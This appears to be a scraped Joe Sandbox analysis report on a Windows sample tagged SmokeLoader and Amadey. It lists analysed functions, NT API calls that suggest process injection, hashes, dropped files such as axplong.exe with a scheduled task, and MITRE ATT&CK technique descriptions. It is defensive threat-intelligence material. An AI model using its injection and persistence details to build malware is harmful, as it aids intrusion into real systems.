Opcode Fuzzy Hash: c898aab9a60dacec9cb8d3c551f958221e1a8305c36d4b70a738d42624c2cfe0
Instruction Fuzzy Hash: B201D6B1204104E7DB00AB909C91EAE3225EB45314F204137F6177A1F1C63DDA13F72B

Function 004018D9 Relevance: 1.3, APIs: 1, Instructions: 46
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,0000001B), ref: 004018FC

Memory Dump Source

Source File: 00000008.00000002.2805606968.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_2.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: acdd9b5a42e831124c8b6e49760cee56bfcaa5315848b06faaf53e45134a159b
Instruction ID: f2f549df329f354b3b401c20711e7f31b0b318a65f62f91b776712bd8f3716b6
Opcode Fuzzy Hash: acdd9b5a42e831124c8b6e49760cee56bfcaa5315848b06faaf53e45134a159b
Instruction Fuzzy Hash: F101ADB6208104E7DB00AA909C91EAA3265AB05310F208137F607791F1C63D9A13F72F

Analysis Process: wsjctfwPID: 4112, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	7.2%
Dynamic/Decrypted Code Coverage:	53.5%
Signature Coverage:	0%
Total number of Nodes:	114
Total number of Limit Nodes:	5

Executed Functions

Function 004014ED Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401591
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015BE
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015E1
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FF
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401640
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401671
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401693

Memory Dump Source

Source File: 0000000A.00000002.3040965043.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_wsjctfw.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 9e14676518553f6f85982dcbf3afacf75dc2e7edcaafa4c3f22e426a2637a743
Instruction ID: a0f923ac19c666167df48063321c4602211009b813072724e4813c1f8ecc7b72
Opcode Fuzzy Hash: 9e14676518553f6f85982dcbf3afacf75dc2e7edcaafa4c3f22e426a2637a743
Instruction Fuzzy Hash: 5D513AB5900249BFEB209F91CC49FEFBBB8EF85B00F144159FA11AA2E5D7749900CB64

Function 00401502 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401591
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015BE
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015E1
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FF
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401640
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401671
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401693

Memory Dump Source

Source File: 0000000A.00000002.3040965043.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_wsjctfw.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 9e63b9ecfe4be7d8a7ba3d3b08fda1f99a0379ccf72b5c629092d1d541f395c9
Instruction ID: a913b1e40e633c8f85971ebcf252a8577c60a808f24cefbb668ada93ab985593
Opcode Fuzzy Hash: 9e63b9ecfe4be7d8a7ba3d3b08fda1f99a0379ccf72b5c629092d1d541f395c9
Instruction Fuzzy Hash: 82512975900245BBEF209F91CC48F9FBFB9FF85B00F144159FA11AA2A5D7709944CB24

Function 00402FA2 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030D6
NtTerminateProcess.NTDLL ref: 004030EF

Memory Dump Source

Source File: 0000000A.00000002.3040965043.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_wsjctfw.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 686d0bbd8fbbb0e36e9062dede5509d684d0615e631ce9e79984e2ae00ef09bd
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: D8412531618E084FD7A8EE5CA845B6277D1E798311F6643BAE809D3389EB34D85187C5

Function 0408003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0408024D

Strings

cess, xrefs: 0408018D
kernel32.dll, xrefs: 0408008F, 04080095

Memory Dump Source

Source File: 0000000A.00000002.3042190062.0000000004080000.00000040.00001000.00020000.00000000.sdmp, Offset: 04080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4080000_wsjctfw.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 68d0e2376ed230e0172ebef7560c98b8ae8c12bfcde663d33fc1ceaa6acb4967
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: C5527B74A01229DFDB64DF58C984BACBBB1BF09304F1580D9E94DAB351DB30AA88DF15

Function 02493CF2 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02493D1A
Module32First.KERNEL32(00000000,00000224), ref: 02493D3A

Memory Dump Source

Source File: 0000000A.00000002.3041945625.000000000248D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_248d000_wsjctfw.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 121fb0a296d25515560470250c2aa12343f7268ecfa76643dc3062cfb86a4874
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 4CF062355007116FDB202FF9A88CB6F7EECAF4A669F1006AAF642911C0DB74EC458A61

Function 04080E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,04080223,?,?), ref: 04080E19
SetErrorMode.KERNELBASE(00000000,?,?,04080223,?,?), ref: 04080E1E

Memory Dump Source

Source File: 0000000A.00000002.3042190062.0000000004080000.00000040.00001000.00020000.00000000.sdmp, Offset: 04080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4080000_wsjctfw.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 8890ddf76d1838fe5ff9a950685d8b4aadf07176e923d6c4abc98b81c7157bb5
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: AFD0123114512877D7403A94DC09BCE7B5CDF05B62F008011FB0DE9080C770954046E5

Function 004018AB Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,0000001B), ref: 004018FC

Memory Dump Source

Source File: 0000000A.00000002.3040965043.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_wsjctfw.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 62342a240628b0d91fda0c5fc5898d72e4a3770bfe4db2c8e1da4b5d333e2b31
Instruction ID: a6957e600d0f380cc1a49893a0184640c9060dab0068a80971e976a9841fdc98
Opcode Fuzzy Hash: 62342a240628b0d91fda0c5fc5898d72e4a3770bfe4db2c8e1da4b5d333e2b31
Instruction Fuzzy Hash: EF115EB2608204E7DB007A959D91EAB36689B01754F208137F647791F0D67D9A13F36F

Function 004018C6 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,0000001B), ref: 004018FC

Memory Dump Source

Source File: 0000000A.00000002.3040965043.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_wsjctfw.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c6b8480d6387d0be74c2680a15768c262fdc67a811919eec1ccb962c6c8c5b1d
Instruction ID: 3a2f5c81bf18647ea8bd665c29415133ba78c7124c14d0eb25db08ac19f46a69
Opcode Fuzzy Hash: c6b8480d6387d0be74c2680a15768c262fdc67a811919eec1ccb962c6c8c5b1d
Instruction Fuzzy Hash: EB017CB6208204E7DB006A919C91ABA3265AB05354F308137F6177A1F1C67D9A13F72F

Function 004018CD Relevance: 1.3, APIs: 1, Instructions: 50
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,0000001B), ref: 004018FC

Memory Dump Source

Source File: 0000000A.00000002.3040965043.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_wsjctfw.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 890295bbc16400368607f1de220e790211fe13653597608cb550117026bfe186
Instruction ID: 7e018f6509b8d0532dd07cdca70325d7c1967a61a895c16753a8143af92e3fd0
Opcode Fuzzy Hash: 890295bbc16400368607f1de220e790211fe13653597608cb550117026bfe186
Instruction Fuzzy Hash: A201B1B6208104EBDB006AA19C91AAA3764AB01310F208137F603791F1C67D9A13F71F

Function 004018D6 Relevance: 1.3, APIs: 1, Instructions: 50
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,0000001B), ref: 004018FC

Memory Dump Source

Source File: 0000000A.00000002.3040965043.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_wsjctfw.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b92cde3abd3b86c5d980f544a787a9edbba97fa7641ef297bd4bd351ee4e25a2
Instruction ID: 5391eea9082683735aba9ad5b562b700e5afefe09d2a5623585dd913bf2439bc
Opcode Fuzzy Hash: b92cde3abd3b86c5d980f544a787a9edbba97fa7641ef297bd4bd351ee4e25a2
Instruction Fuzzy Hash: 96018FB6208204E7DB006A919C91EAA3265AB05350F308137F607791F1C67D9A13F72F

Function 024939B1 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02493A02

Memory Dump Source

Source File: 0000000A.00000002.3041945625.000000000248D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_248d000_wsjctfw.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: b28be9f9db4296cb668d87a5a50e47831972239c95941f9ffb0fd1d2c9985201
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 2B113979A00208EFDB01DF99C985E99BFF5AF08750F0580A5FA489B361D371EA90DF80

Function 004018DD Relevance: 1.3, APIs: 1, Instructions: 47
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,0000001B), ref: 004018FC

Memory Dump Source

Source File: 0000000A.00000002.3040965043.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_wsjctfw.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c898aab9a60dacec9cb8d3c551f958221e1a8305c36d4b70a738d42624c2cfe0
Instruction ID: 902ef340cd8b3ef667722f9b3bcd4aee67b167148464105025906d49d211b71e
Opcode Fuzzy Hash: c898aab9a60dacec9cb8d3c551f958221e1a8305c36d4b70a738d42624c2cfe0
Instruction Fuzzy Hash: B201D6B1204104E7DB00AB909C91EAE3225EB45314F204137F6177A1F1C63DDA13F72B

Function 004018D9 Relevance: 1.3, APIs: 1, Instructions: 46
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,0000001B), ref: 004018FC

Memory Dump Source

Source File: 0000000A.00000002.3040965043.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_wsjctfw.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: acdd9b5a42e831124c8b6e49760cee56bfcaa5315848b06faaf53e45134a159b
Instruction ID: f2f549df329f354b3b401c20711e7f31b0b318a65f62f91b776712bd8f3716b6
Opcode Fuzzy Hash: acdd9b5a42e831124c8b6e49760cee56bfcaa5315848b06faaf53e45134a159b
Instruction Fuzzy Hash: F101ADB6208104E7DB00AA909C91EAA3265AB05310F208137F607791F1C63D9A13F72F

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\2[1].exe

C:\Users\user\AppData\Local\Temp\1000030001\2.exe

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\wsjctfw

C:\Windows\Tasks\axplong.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
setup.exe

Function 0023BD60 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310
networkfileCOMMON

Function 0023E440 Relevance: 14.6, Strings: 11, Instructions: 878
COMMON

Function 002365B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Function 00243550 Relevance: 53.3, APIs: 1, Strings: 29, Instructions: 761
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre